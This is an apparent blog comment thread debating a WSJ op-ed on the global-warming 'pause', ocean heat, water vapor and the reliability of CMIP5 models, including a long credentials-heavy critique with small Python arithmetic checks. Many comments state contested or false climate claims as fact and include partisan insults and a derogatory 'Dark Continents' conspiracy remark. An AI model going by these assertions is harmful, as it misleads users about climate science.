Ice levels are not dropping any more than they have in our historical past, if at all – the lack of sea-level increases should convince anyone that this claim is bogus. And the oceans aren’t globally warming either. Shredding ignorant claims like Barry’s is just too easy…. Barry: “… and why does the WSJ continue its irresponsible journalism of printing only one-sided Opinion pieces?” ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Setting aside your other errors and lapses in logic, you are mistaken about the WSJ. They have at least one columnist who very frequently writes articles supporting climate alarmism and attacking skeptics. His name is Paul Farrell. Whatever made you assume otherwise? Okay, one more comment on your lack of logic. You attack a skeptic author as not being a ‘climate scientist.’ Do you also attack columnists who support climate alarmism who are not ‘climate scientists’? “Global warming is caused by the desire for more tax money.” Governments should defund climate science, leaving climate scientists to elicit funds door-to-door. Save the clock tower, er, planet! How much would you be willing to pay for their models and prognostications? How much would you pay to know the Arctic will be ice-free by 2014 and snowfall a rare and wondrous event? The WSJ published an article about a fact: global warming has stopped. What is recorded in the oceans is less than half of what was predicted and somehow bypassed the first 700 meters, and below that the data error margins make any conclusion meaningless. So Peter, are you in denial of this? Why should a journal suppress the truth? Peter, regardless of what you think of Murdoch Snr. and his propaganda network, you should try to address every argument on its merits; otherwise you are probably committing one kind of fallacy or another. Attacking the source of an argument, the publisher for example, is an ad hominem fallacy. Whatever happened to global warming?
What’s your favorite excuse for the failure of the models? Reblogged this on I Didn't Ask To Be a Blog and commented: “It has been roughly two decades since there was a trend in temperature significantly different from zero.” Most understand that the science, as explained by alarmists, is not robust. Most scientists understand it is wrong. No amount of obfuscation will force nature out of its self-regulating ways. If climate were so easily and drastically controlled by one of its parameters, we would long ago have had a planet that would not support life. The question is, why did we not have runaway warming when CO2 was at much higher levels? The answer seems to be that, like today, CO2 followed temperature with a substantial time lag, and the self-regulating ability of natural variations easily overwhelms any climate effect caused by humans. No one has proven that warmer and more CO2 is not a beneficial thing today, when it has always been so in the past. Were it not for hubris we would not be having this debate. The reason the leaders of China, India, and Germany will not attend the meeting is that they, like the Democrats, do not want to be seen with the incompetent, incoherent, “lead from behind” Leader of the Flee World. (That is not a spelling mistake. Mr Obama flees from responsibility, knowledge and transparency.) They understand that everything he touches turns into chaos and he will evade repercussions from the inevitable disastrous results of his actions or lack of actions. China and India want US money. Germany now sees that they need coal-powered electricity. Whoever would have thought of that? Their governments are in enough trouble. They don’t want to take a giant step down to Mr Obama’s level. End of rant. “We call it riding the gravy train” I should rewrite “Have a Cigar” with witty global-warming lyrics for a laugh. The U.N. will, I’m sure, create another cudgel, since this one is off the rails.
And all the ignorant Euros will swallow the next thing hook, line and sinker too. Meanwhile Obama and the Democratic party are still beating this dead horse. richardscourtney September 5, 2014 at 6:29 am Ian W You are spouting rubbish. Both CO2 and H2O are radiative greenhouse gases. It is a function of their molecular shapes. Richard So you are saying that water molecules in a water droplet or ice crystal behave just like CO2 molecules when they are hit by infrared photons? Do they immediately re-emit that IR in the same way as CO2? What part of greenhouse “gas” do you not understand? Water vapor, in the gas phase, is a powerful IR absorber. In fact, it is a much stronger absorber across the IR spectrum than CO2 is. In the liquid phase, the spectrum is considerably distorted and there is a large, broad absorption band due to hydrogen bonding. Experimentally, water is quite a nuisance when doing IR work. Samples must be thoroughly dried lest residual water swamp out the spectrum of your sample of interest. Also, humidity can cause problems with the spectrometers themselves, if left unchecked. You correctly note that water, with its high heat capacity and large phase-change energies, moves large amounts of heat through the atmosphere via convection. But we note that these are quite separate processes. Not exactly separate, for they deal with the same energy, and that energy cannot multiply on its own. By this I mean that the ratio of how much of the same energy is conducted vs. radiated vs. convected, etc., varies depending on the composition of atmospheric gases, the wavelength or light spectrum, and the materials encountered, including of course water or oceans. The Pause Is Because of Flaws In the Cause Good one……………… They won’t run out of catastrophes. The myth of overpopulation is still hangin’ in there.
Probably there are many regular WUWT readers who buy into this idea of us White Westerners going over to all of the Dark Continents, with Paul Ehrlich and Bill Gates, so we can put birth control in the water, promote rampant abortion, and conduct secret and coercive sterilizations on women. The CAGW scam is practically the same, with all of the funded research, NGOs, the UN, and the Jesus-Complex All-Knowing Planet-Saving Good-For-Thee-But-Not-For-Me Marxists saving us from ourselves. Thanks, Matt Ridley. Sanity and common sense should return. The commentary is technically correct if you are focused on the temperature of air, which is just one part of the earth’s biosphere that is warming. Increased temperature can manifest itself in the air, in the surface waters of the ocean, or in deep ocean waters. Please look a bit more carefully into the literature before reaching this conclusion. Ocean currents, which undergo cycles that can last decades, determine to a large extent where increased heat builds up. The earth has been in a multi-decade period where ocean currents have resulted in heating of deep ocean water (below 300 m). The amount of heating corresponds well with what is predicted from climate models based on atmospheric CO2 increases. At some time in the future (known from experience with many past events), the circulation pattern will change and that water will be brought to the surface, at which time surface ocean and air temperatures likely will increase rapidly. Don’t take my comments as valid, and likewise, don’t take the comments of the others who have replied here as valid either. Instead, please take a look at a journal article published in Nature Climate Change (“Recent intensification of wind-driven circulation in the Pacific and the ongoing warming hiatus”), Volume 4, March 2014, pages 222–227. This article clearly explains the phenomenon that I have described. Then you will have a broader context of information on which to base your conclusions.
Karl says, “The earth has been in a multi-decade period where ocean currents have resulted in heating of deep ocean water (below 300 m). The amount of heating corresponds well with what is predicted from climate models based on atmospheric CO2 increases.” Please, but no. From 0 to 700 m there is virtually no warming within the error bars, and less than one third of what the CAGW models predict. From 700 m down, about half the warming predicted by the models (I guess for climate science this is damn good). Now pray tell me, assuming (though scientifically we are inside the error bars, so we should not assume), how is this fraction of a degree of warming in the deep oceans, with a turnover of about 1000 years, going to manifest as CAGW in the future? It is always helpful to step back and take a look at the big picture occasionally. Incidentally, this also helps explain the UHI effect (cities are like deserts in that they inhibit evaporation and convection). This also explains how the real greenhouse effect is due to sunlight penetrating the ocean’s surface. There is not one shred of evidence that the earth’s climate system works the way the models have it working. Not one shred of evidence the models are correct. Not one shred of evidence the modelers have a clue. Here’s what they have: CO2 is a greenhouse gas (true), atmospheric CO2 is increasing (also true), human emissions are causing the rise in atmospheric CO2 (mostly true), therefore the warming in the late 20th century was caused by CO2 (unproven, but likely somewhat true), and if human CO2 emissions continue, it will cause a climate cataclysm (pure speculation). This is what sprang out at me when they tried to offer any explanation for the pause. I have repeatedly been told by fantasists at the Guardian (quoting SkS) that CO2 was now the main driver of climate. I knew this was rubbish, as the standstill was around a decade long back then. Here is the main driver and control knob in action.
“Global Temperature Update – No global warming for 17 years 11 months” I assume there are at this moment climatetistas out scouring the myths and fables, rumors and hints of other remotely possible disasters upon which to build an edifice of profitable hysteria and profit. The media naturally will do what it can, and Mother Government will yet again energize its merry band of memoranda-reading, overpaid government louts, every last one counting his days to retirement. This is our opportunity to beat them to the punch. May I nominate global cooling as the bogeyman — once the world runs out of fossil fuel, CO2 will drop off a cliff, and there will be no way left open to us for preventing the sudden onset of the ice age. Therefore, to prevent this, we must cut down on fossil fuel use now, in order to save it for our grandchildren! We must store CO2 underground, so that we may release it to avert future disaster! The WSJ has been publishing op-eds by Fred Singer for at least 20 years, so your history is incorrect and the implication of some sort of Murdoch coup is incorrect. So how do we, the taxpayers that have been swindled of our dollars, get our money back from the AGW crowd? Who do we sue, or what recompense do we have? Global warming is in recession right now…. The important comment from Ridley’s article: “leaders from China, India and Germany have already announced that they won’t attend the summit”. Things will begin to change as the financing spigot slowly shuts down. Nothing happened, but nothing was happening. Thanks. That’s a nice overview and update, especially for casual observers of the topic most susceptible to the policy scam underway. As we can all see from the above, the Science doesn’t appear to be entirely settled. Please explain what that has to do with the predictions versus observations made by climate scientists regarding temperatures. Some of us will listen if you actually have something to say.
Posts like the one you’ve just made, however, make you look like a crazy person. [To whom are you addressing your question? Those who claim CAGW will be catastrophic despite 18 years of data showing they are wrong? Or the writer/administrator of this blog? .mod] Moderator: The threading says he is replying to Peter… don’t worry, you’ll get used to it ;) Why is the US the sole party in charge? We have regulations in place. Put the pressure on Asia to clean up their act before we do anything more or sign any more Kyoto protocols. Yeah, put some pressure on Asia; right after you’ve “isolated” Russia, good luck! “It has been roughly two decades since there was a trend in temperature significantly different from zero.” — The alarmists thought they had everything covered when they switched from “global warming” to “climate change”, because the climate is always changing to some degree. They knew that either an upward or downward trend in temperature could be used to indicate a “change” in the climate. The last thing they expected was a long period of zero trend. That threw a monkey wrench into their plans that they didn’t count on. It’s really hard to alarm people about climate change when the climate refuses to change. — Clouds cool the world, Anthony, they don’t make it hotter. Plus ça change, plus c’est la même chose… @hengis: Sorry, but ‘back radiation’ is not a real energy flux, merely a potential energy flux. The heating of the oceans is by SW energy from the Sun. The maximum SST is ~31 deg C when (exponential with temperature) evaporation kinetics dominate. IR emissivity becomes very small because most vibrational excitation is transferred to breaking hydrogen bonds and giving substantial kinetic energy to the freed water molecules. The public and state governments are very confused over the global warming/climate change issue, and reading these comments it’s no wonder.
Some of you who have commented are experts in some field, at least academically, but you present diametrically opposed interpretations of what’s going on with GW/CC. In short, you don’t know what you are talking about and you are confused too. I believe there is obvious bias in scientists along political ideologies, and it shows here. If this article was. You have committed two more logical fallacies, the “Straw Man” and the “Red Herring.” I did not claim that millions of people around the earth are in great danger from the effects of GW/CC, yet that is the argument you attacked. I said, “if this article appeared?” That does not mean that I imply that the danger to people around the world is inevitable or imminent. I may not believe that at all. Indeed, your minimization of the effects of GW/CC is dangerously ignorant of the facts on the ground; empirical reality; that is, climate data collected and analyzed, and projections made based on clearly defined assumptions. This is not model data, but model validation data from the real world. This doesn’t mean these projections will happen with certainty; each has an associated likelihood based on its set of assumptions about future climate events and remediation implementations. In fact, it is you and those of like OPINION who are exaggerating, thus lulling the public and officials into a false sense of security. It is basically propaganda. You have no idea when global warming will pick back up, and you have no idea how long it will last or how severe it will be, or what its acceleration will be. There are climate scientists and atmospheric physicists who study this every day and collect and analyze data every day. Their job is to report their findings in scholarly journals, with their research reports and findings subject to peer review, thus gaining a good measure of objectivity.
Your self-appointed job seems to be to take pot shots at these experts from the sidelines, calling into question their character, competence, honesty and motives for doing their work. Why don’t you learn something about the subject and people at which you throw darts in a way reminiscent of “Blind Man’s Bluff”? That way your criticisms would carry more weight. If you were competent to speak with authority on this subject, you would be a practicing climate scientist, and you would present your findings to substantiate your claims and be in line to win the Nobel Prize. Get with it; I wish you good luck. If you need an expert mathematical modeler, simulation expert, and big-data analyst, I stand at the ready to lend you a hand. G. Mr. Grubbs, Yes, it does. As for my knowledge of empirical reality, which you hyperbolically claim I am “dangerously ignorant of,” how would you know? I commented on the 90 CMIP5 models versus the satellite data–that’s hardly an exaggeration–and the assumption that experts on the NYT would claim “millions of people around the earth are in great danger from the effects of GW/CC,” which I have never seen in the comments section of the NYT… not from identified scientists. As for my “OPINION” being propaganda: no. It was a two-sentence comment on your remarks. Not a treatise. And not without the context of this thread. Ditto global cooling. What experts? I was talking to you. Facepalm. I prefer rgbatduke [Dr. Robert Brown from Duke Univ.] and others who comment here and are able to explain the physics of what modelers are unable to model because they don’t know yet. These are not anti-model screeds; they are measured assessments from their various fields about what the 35-year-old climate science doesn’t understand (for example, the ARGO data is barely a decade old; it will take another 30–40 years to make intelligent and realistic models of the oceans). Who is trying to prove GW/CC false? What a ridiculous premise; cart before the horse.
The point, or issue, is to discover the physics of what is going on: cause, not correlation. Or supposition. Or hypotheses declared as fact. Dearest Mr. Grubbs, since you questioned my credentials, I am happy to provide them. Ph.D. in theoretical physics (dissertation on a multiple-scattering-theory solution to the single-electron problem in crystal band theory). As an undergrad and grad student, after getting AP credit for calculus I completed two “introductory” math classes (multivariate calculus and linear algebra, the latter in the advanced section reserved for math majors). I then jumped to graduate courses in complex variables, PDEs, and functional analysis, all taught by Mike Reed (who literally wrote the book on functional analysis along with Barry Simon). In grad school I added two more graduate math classes — one on topology and one on the mathematics of classical mechanics (action principles, group theory, etc.), taught in the math department, not physics. Six graduate-level math classes (four taken as an undergraduate) did not make a math major (I skipped, e.g., number theory, ODEs, and “advanced algebra”, all required for a major anyway), and Duke did not offer minors at that time, but OTOH they really covered everything but number theory to excess. I would honestly self-assess my competence in math (my research and dissertation were basically solving advanced PDEs) as easily equivalent to a BS in math, maybe even a masters, since at this point I’ve taught a two-semester survey of math methods in physics that covered probability theory, ODEs, group theory, and so on, in addition to teaching quantum and electrodynamics, which is basically advanced vector calculus and algebra and group theory, right up against the edge of differential geometry (I sat in on around 1/3 of a course in differential geometry before research pulled me away as well).
I’m still weak on number theory, although I’ve worked through about half of a decent textbook on the subject, but I’m strong on things nobody even offers courses in, such as geometric algebra (e.g. complex numbers, quaternions, generalized Clifford algebras — graded division algebras). There are probably a few holes compared to an undergrad major who completed all of the sequence, but the holes are where I’m not that interested as a physicist more interested in solving problems than in formal proofs concerning abstract objects. OTOH I have lots of places where my knowledge is likely beyond most math Ph.D.s. What I am not, credentialing aside, is incompetent in math. Quite the contrary. I can walk to a board and start teaching calculus through (common) ODEs and PDEs without notes, and with a tiny bit of prep could teach a lot more. I’ve had only three courses in computer science — one intro, one on computer architecture, one on numerical methods — but again I, like many scientists whose work involves a lot of computation, have acquired professional competence in the field. If you google “rgb beowulf duke” you’ll still get around 15,000 hits, although back when the beowulf archives were online and the topic was happening it would have been closer to 250,000. I’ve been a professional systems/network administrator for 27 years, although I’m no longer particularly active in administration and my knowledge of current tools is probably limited (although easily refreshed). My personal subversion-based code tree is deep and wide and gigabytes in size. I periodically teach selected computer science majors independent-study courses in CPS that count towards their majors, with permission from the department. I’ve trained a number of systems administrators.
I wrote the first two versions of Duke’s security and acceptable use policies and was a primary faculty advisor to deans and vice-chancellors responsible for the development of Duke’s network as it evolved from twisted pair 56 kb serial lines to gigabit and internet 2. I am co-founder (CTO) of an internet security company that is just getting off the ground. I have written a book on the engineering of beowulf-style compute clusters and parallel scaling, wrote a daemon-based open source cluster monitoring software package that was popular for a while. I have written a small mountain of predictive modeling software — primarily advanced, genetically optimized neural networks but a smattering of nonlinear regression code back before R came out and made it silly to write your own code to do that sort of thing — and have founded two companies (CTO again, contributing both code and knowledge of statistics, probability theory, modeling, AI, pattern recognition, etc) doing predictive modelling for money, and the current incarnation of the second one is still extant: and making money. The last 15 years of my research career were spent doing large scale numerical simulations on homebrew linux-based parallel supercomputers (hence my connection to beowulfery) — primarily importance sampling Monte Carlo in condensed matter studies of critical phenomena (second order phase transitions) and autocorrelation, numerically solving Langevin/Generalized Master Equation sets to model quantum optics, and so on. I would say that I’m fairly expert on many, but of course not all, aspects of large scale computer modelling. It’s a big field. 
I’m hardly a novice, though, either in statistics, probability theory, computer science, or predictive modeling — in particular applying Bayesian methods in the construction of super-advanced, nonlinear, multivariate models — models of extremely high dimensionality (as in up to hundreds of dimensions) — not to publish papers in the field but for the real payoff — to get paid for it, in competition with lots of other highly competent folks trying to do the same thing. Just for grins, I’m also the author of dieharder (you can google that, too), an open source suite of random number generator testing tools. One of my favorite books is E. T. Jaynes’s excellent “Probability Theory: The Logic of Science” — in a sense you could call me a disciple of Jaynes, as he was also a primary reference for some of my work in optics although I never met him professionally. You can take it for granted that I am highly knowledgeable about hypothesis testing, the Cox axioms as the basis for axiomatic probability theory and epistemology, quantified doubt as the basis of sound knowledge, the Bayesian “loop” of priors, models, and posterior probability correction based on empirical outcome, stuff like that, and not in any sort of ivory tower sense. In recent years, I have become something of a devotee of William Briggs, a professional statistician who spends much of his time, curiously enough, tearing the statistical basis of much of climate science to shreds because its statements are all too often indefensible nonsense. My credentials in climate science per se are still fairly limited. I’ve been studying the field for five or six years at this point. I’ve worked through Grant Petty’s excellent book, “A First Course in Atmospheric Radiation”, although I may have mislaid my copy while teaching physics at the Duke Marine Lab this summer and will probably have to purchase a new copy.
Most of the physics in it I’m already familiar with from working in and teaching E&M, quantum mechanics, thermodynamics/stat mech, and so on, so the book is comparatively easy for me to understand. I’ve also worked through Caballero’s textbook on climate science, which walks one through things like basic thermo (already known) and up to in-context discussions of things like the adiabatic lapse rates dry and wet, reduced temperature, atmospheric potential, the greenhouse effect. The one thing I haven’t really done much with personally is fluid dynamics — I know a lot about it (from teaching the intro levels if nothing else) but Navier-Stokes and the solution of actual physical fluid models near the various nonlinear critical points (onset of turbulence, for example) I have not done actual computations in. That does not stop me from reading about it, understanding the general structure of the PDEs involved, and appreciating the incredible difficulty of solving them. Mathematicians don’t even have existence proofs for NS — it is a grand challenge problem. Which brings me to my own opinion on the subject, you can judge on any basis you like if it is ill-founded or ignorant. Climate models attempt to solve two nonlinearly coupled NS-systems — the atmosphere and the ocean — externally driven by both nearly periodic drivers and by what amount to “random” modulators, some of which are long-period internal feedback loops within the highly non-Markovian system itself with its broad spectrum of autocorrelation times. They attempt to do so on a grid no smaller than 100x100x1 km in size at the equator, with timesteps of ~100km/340 m/sec = 5 minutes (the time required for sound to propagate across the non-uniform lat/long cells, but absurdly long compared to the vertical propagation time or the oceanic propagation times). 
Since the Kolmogorov scale for nonlinear dynamics in the atmosphere is order of 1 mm, these spatiotemporal cells are order of 10^7 x 10^7 x 10^5 x 10^7 = 10^26 — 26 orders of magnitude — too large to have a good chance of actually solving the NS equations. One can argue that one can coarse grain at this scale, create smoothed approximations of the cell dynamics, and solve systems like this and have the solutions obtained end up being meaningful, but there is no evidence that this is the case. In fact, there is substantial evidence that this is not the case, both from many other nonlinear chaotic systems where the minimum scale for microscopic dynamical models is the minimal scale for a reason (that reason being that you get garbage if you try doing the computation at coarser resolutions), from plain old numerical computation theory of quadrature where we know perfectly well that we cannot even numerically solve completely deterministic and boring systems like planetary orbits with a coarse timestep and little error control and end up with anything like the actual answer, especially after many timesteps, and above all, empirically — because the models suck at predicting anything outside of their reference period. I strongly suggest that you download Chapter 9 of AR5 and read it in its entirety, but especially sections 9.2.2 and ff — where they acknowledge that the multimodel ensemble mean is completely meaningless as far as being supported by the axioms of probability and statistics are concerned — and that no effort is made to subject the individual models of CMIP5 to a simple hypothesis test by comparing their individual runs to the data. This is not done because if it were done, the game would be instantly over. Turn to figure 9.8a in AR5. 
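For what it is worth, the back-of-envelope numbers above are easy to check. A quick sketch using only the figures quoted in the text — the 100 km cell, the 340 m/s sound speed, and the four per-dimension orders-of-magnitude factors:

```python
# Sanity-check the quoted scales; all inputs are the comment's own numbers,
# not independently derived values.
cell_width_m = 100e3              # 100 km horizontal cell
sound_speed_m_s = 340.0           # speed of sound used for the CFL-style step
timestep_s = cell_width_m / sound_speed_m_s   # ~294 s, i.e. roughly 5 minutes

# Per-dimension mismatch vs. the ~1 mm Kolmogorov scale, as quoted:
# two horizontal factors of 10^7, one vertical 10^5, one temporal 10^7.
total_orders = 7 + 7 + 5 + 7      # = 26 orders of magnitude
```

The point of the exercise is only that the quoted factors are internally consistent; whether coarse-graining at that resolution can be made meaningful is the substantive question the text goes on to address.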
This figure presents a spaghetti graph of the CMIP5 models (sufficiently jumbled together that it makes it difficult to see instantly how terrible they really are individually at predicting the climate) against both HADCRUT4 (primarily) and the meaningless MME mean. Note well that each curve in the spaghetti is already a perturbed parameter ensemble mean of anywhere from a very few to hundreds of runs (yes, this asymmetry of data contribution is a problem, see 9.2.2 and ff). Since the variance per model is nevertheless much greater than that of the actual climate (and since none of these averages come anywhere near tracking the actual climate) we can fairly safely assume that if we were to compare individual model runs to the climate their variance would be around an order of magnitude too large. This alone would be instant cause for rejection in the specific sense that the model in question is clearly inadequate to use at all as a basis for formulating public policy that is killing millions of people a year now by misdirecting funds that could be used to (for example) end world poverty and the preventable deaths of children into a hypothesis of “catastrophe” that has no sound theoretical or quantitative support. The models do not just fail in the present. They also fail, badly, to hindcast the past. Note well that the collective MME mean spends roughly 90% of its time warmer than the actual global average temperature even in the past all the way back to the beginning of HADCRUT4. It utterly fails (as do the individual models) to reproduce the significant climate variations of the early 20th century as well as the entirety of the 21st century. Indeed, the only time it does a good job is in the reference period! You seem to claim to be a professional predictive modeller. How impressed are you by a model that fits its training data but fails to predict either trial data from the past or future data with any skill?
What would you estimate the p-value is of the null hypothesis “this model is a perfect, valid model of the climate” comparing the outcome of each of the models in the spaghetti to reality, one at a time, in 9.8a? Eyeballing a crude estimate based on the probability of the MME being too high 90% of the time instead of 50% of the time given at least 10-12 independent “trials” (with a presumed autocorrelation time of a decade) we get what, exactly? And the MME is going to be an upper bound on p for almost all of the PPE means, and the PPE means themselves aren’t even the proper basis for the hypothesis test — one really has to determine the probability of getting the actual climate given the envelope and distribution of PPE results, not just global surface temperature anomaly but results in several other dimensions — global distribution of rainfall, prediction of LTT, etc. Seriously, anyone who knows anything at all about modelling would reject (almost all of) the CMIP5 models out of hand, one at a time or collectively, if their skill were rigorously compared to reality. If you were shown this data, told that it was a prediction of some stock in the stock market, would you invest in it? Only if you were a serious gambler. If you’d bet on AR3 predictions to within almost 100%, you’d be broke today. In real science, rather than fund-me-to-save-the-world science, nobody would be surprised by the failure of the models to have any skill. We wouldn’t expect them to, as they are just modified weather models and we already know weather models have no skill as little as weeks out. We wouldn’t expect them to, as we already know that dynamical models of this type do not fare well when integrated at a scale twenty-plus orders of magnitude too large.
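The eyeball estimate above can be made concrete with a one-sided sign test. A minimal sketch, assuming (as the text does) roughly ten effectively independent decadal-scale intervals, asking how likely an unbiased model would be to sit above the observations in nine or more of them:

```python
from math import comb

def binom_tail(n, k, p=0.5):
    """P(X >= k) for X ~ Binomial(n, p): the one-sided sign-test p-value."""
    return sum(comb(n, i) * p**i * (1 - p)**(n - i) for i in range(k, n + 1))

# An unbiased model should run warm about half the time; being warm in
# ~9 of 10 independent intervals is already improbable under that null.
p_value = binom_tail(10, 9)   # 11/1024, about 0.011
```

With 12 intervals and 11 of them warm, the tail shrinks to about 0.003; either way the “unbiased model” null would be rejected at conventional significance levels, which is the crude point the paragraph is making before even getting to the multi-dimensional version of the test.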
We wouldn’t expect them to, given that the scale of integration is too large to resolve lots of meso-scale (not even micro-scale — meso-scale!) energy transport phenomena that are critical to the climate system, such as thunderstorms, clouds, the water cycle in general, soil, vegetation, rivers and reservoirs, the UHI. All of these phenomena are rolled into ad hoc phenomenological terms for the cells that we are then told are “physics based” as if this is either true or relevant when solving the NS equations at an absurd resolution. The models as solved aren’t even conservative and have to be renormalized regularly to prevent drift, and all of this is with parameters for critical processes that aren’t even set to be the same between models. Finally, the models in CMIP5 aren’t independent, aren’t unbiased samples drawn from some sort of pool of models, so we have no a priori reason to trust either the mean or any of the moments of collective statements about the climate. It would be a miracle if they worked. This is why climate scientists are back-pedalling as fast as they can as the climate has finally started to deviate from the models by enough that no amount of statistical band-aiding or obfuscatory graphing of the models compared to reality can conceal this simple fact from the politicians who have been more or less deliberately misled for nearly twenty years now by a comparatively small, but powerful, group of other politicians and climate scientists who have effectively controlled the funding of the entire multidisciplinary science. The oceans are not rising any faster than they have from time to time over the last 140 years. The temperature is varying with the same general pattern it has followed for roughly the last 165 years. LTTs have been flat for most of the time we have measured them with satellites.
The global surface temperature anomaly has been flat for long enough that AR5 has an entire Box devoted to ex post facto explanation of this inconvenient truth, and the continuation of flatness for another whole year and continued semi-fizzle of the ENSO event that was supposed to “rescue” the models has — so far — encouraged the number of “explanations” for this pause to double in the literature in the meantime. “Climate sensitivity” is in free-fall, down from Hansen’s absurdities of 5 C or more by 2100 to under 2.0 C in the current warmist literature, and the data is looking like it is supporting an even lower estimate of 1 to 1.5 C. Indeed, all of the warming in the era where CO_2 has substantially increased — call it 65 years — has occurred in a single 15 to 20 year burst from 1978 (or 1983) to 1998. For all of the rest of that stretch, temperatures have been flat to slightly descending. There is one simple way to understand this — a way outside of the complexities of climate models. If we assume even a single layer model like that expressed in Petty, we can easily — for a given set of absorptivities — find the fixed point, including the warming due to the GHE. This model is basically a linear model — the absorptivities and albedo are held to be independent of the temperature — and if one makes it into a dynamical model by assigning some heat capacity to the various reservoirs, then if one increases the initial temperature of the reservoirs over the fixed point the system will be driven back to the fixed point. If, OTOH, the absorptivity is itself a function of temperature, it isn’t so simple. Suppose absorptivity increases (approximately) linearly with temperature, also known as “positive feedback” (from e.g. water vapor) in the vicinity of an initially assumed, consistent, fixed point. Then increasing temperature increases absorptivity. There is no longer any clear fixed point.
If average temperature increases monotonically with absorptivity, and absorptivity increases monotonically with temperature, even if the system has a fixed point for some initial conditions it isn’t clear that that fixed point will be stable. Natural fluctuations will drive the fixed point itself into a random walk. Random walks are themselves not stable — they diverge like the square root of the number of steps. The system must have negative feedback to be globally stable to fluctuations in a Langevin-type model of driven dynamics plus random noise — its response to any positive fluctuation in absorptivity-driven “gain” has to be to decrease, not increase, the effect of the fluctuation on the average (fixed point) itself. Otherwise in a warm year, net water vapor content would (on average) increase, which would increase absorptivity from water vapor as a GHG, which would shift the fixed point up, so that the system did not return (on average) to the same fixed point it started from but to one a bit higher. Fluctuations up and down would not average out to zero, but to a steady drift either up or down, like a random walk in 1D. Only if increasing water vapor has a compensating nonlinear effect, such as increasing average albedo, to make net feedback negative will the system return to its former fixed point. Indeed, the nonlinear dynamical fixed point would have positive feedback if it was too cool, negative if too warm. It would resist both perturbations in the water vapor channel itself and additional forcing from CO_2, not augment it. In other words, there is a very good reason — long before one builds models — for thinking that the system is moderately stable, and that the average temperature is in fact the sort-of fixed point where things like water vapor feedback change sign, so that warmer cools, cooler warms, by modulating the entire water cycle — not just absorptivity, but albedo and latent heat transport.
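The single-layer argument can be sketched numerically. This is my own toy model, not anything taken from Petty or any GCM: a one-layer grey atmosphere with assumed solar constant S ≈ 1361 W/m², albedo 0.3, and longwave absorptivity eps, whose fixed point satisfies sigma*T^4 = (S/4)(1 − alpha)/(1 − eps/2). Letting eps rise linearly with temperature (a crude stand-in for positive water-vapor feedback) shifts the fixed point upward, exactly the drift described above:

```python
SIGMA = 5.670e-8        # Stefan-Boltzmann constant, W m^-2 K^-4
S, ALPHA = 1361.0, 0.3  # solar constant and planetary albedo (assumed values)

def fixed_point_temp(eps):
    """Surface temperature of a one-layer grey atmosphere with
    constant longwave absorptivity eps."""
    return ((S / 4) * (1 - ALPHA) / ((1 - eps / 2) * SIGMA)) ** 0.25

def fixed_point_with_feedback(eps0, gain, t_ref=288.0, n_iter=500):
    """Iterate T -> fixed_point_temp(eps(T)) with eps = eps0 + gain*(T - t_ref),
    clamped to [0, 1]. Positive gain mimics water-vapor feedback; the
    iteration converges to a shifted fixed point while the loop gain < 1."""
    t = t_ref
    for _ in range(n_iter):
        eps = min(max(eps0 + gain * (t - t_ref), 0.0), 1.0)
        t = fixed_point_temp(eps)
    return t

t_no_feedback = fixed_point_temp(0.78)               # roughly Earth-like, ~288 K
t_feedback = fixed_point_with_feedback(0.78, 0.002)  # shifted warmer
```

With a small positive gain the iteration still converges, but to a warmer fixed point; crank the gain high enough that the loop gain exceeds one and the iteration runs away toward eps = 1 — the toy version of “there is no longer any clear fixed point.”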
If this collective nonlinear cycle produced positive warming feedback in the neighborhood of its fixed point(s), the system itself would probably be unstable and the Earth would be Venus. It does not. On the cooling side things are more worrisome, as the Earth is at least bistable, maybe tristable, with both the current deep glacial oscillation as a known stable cold phase and a spectrum of shorter period not-so-deep glacial oscillations from the earlier part of the Pleistocene to worry about as a third locally stable state of the system. There is strong evidence in the ice core data that the Earth can plunge into cold phase in as little as a decade when conditions are right, given remarkably little alteration in the driving/forcing. Since we do not properly understand this bistable behavior (well enough to predict it with much skill) and we absolutely do not understand the underlying multivariate dynamics, quasi-particle large scale structures or dynamical variations in either driving (such as ENSO, the PDO, the NAO, the solar cycle, Milankovitch stuff) it is very hard indeed to say if the Earth’s global state on geological time scales is unstable to cold phase transitions. The LIA suggests that it might be. There is little evidence that even the interglacials have a warm phase that is accessible that is more than a degree or so warmer than current temperatures, either in the record of the Holocene, in ice core data, or in longer term radiometric proxies, although the 600 million year record is one of steady, systematic variation right down to the current all time low of global average temperature. rgb RGB, I never questioned your credentials. You must have me confused with someone else. I did say that some people are throwing around their academic degrees like insecure ivory tower types (or something like that), but you are certainly not included in that group.
In fact, I paid you a compliment by citing your entries as the only ones that seemed competent and clear and contributed to the question at hand. Be sure that I will check out your claims to see if they hold water. My gut tells me that there are flaws in your arguments, but it will take some effort to unpeel your onions. But, now that you’ve self-disclosed, I think you went much too far overboard. You are now acting like an academic twerp in my opinion. We all can sling degrees and academic accomplishments around, can’t we? What does that prove? What does theoretical physics prove? What does anyone’s degrees prove? I will cave to peer pressure and briefly follow suit: I have degrees in applied physics, applied math, computer science and philosophy of science. I started college courses when I was 14; took modern algebra, topology, advanced calculus, advanced differential equations, and complex analysis before I entered college. (I had all kinds of academic awards; am a member of Phi Kappa Phi, Sigma Xi, etc.) I don’t have a PhD, only two masters. I elected to work in the real world for over 53 years and I am still at it. I learned more practical knowledge in my first year on the job than in my entire classroom experience, although my studies were valuable to my career in learning how to solve problems, and learning how to learn. So what does that prove about my knowledge of climate science? By and large, nothing. The same is true for you, a theoretical physicist, although I found your exposition on atmospheric physics possibly enlightening if true, but I sensed it to be speculative to some degree. So, let’s stop this academic “pissing contest” – you win – you can piss further than I can. You can piss further than anyone can. You are the winner! Now, let’s start from there and have a reasonable discussion of current climate science (established) facts, and what the climate scenarios for the world to come are likely to be, and state the various likelihoods.
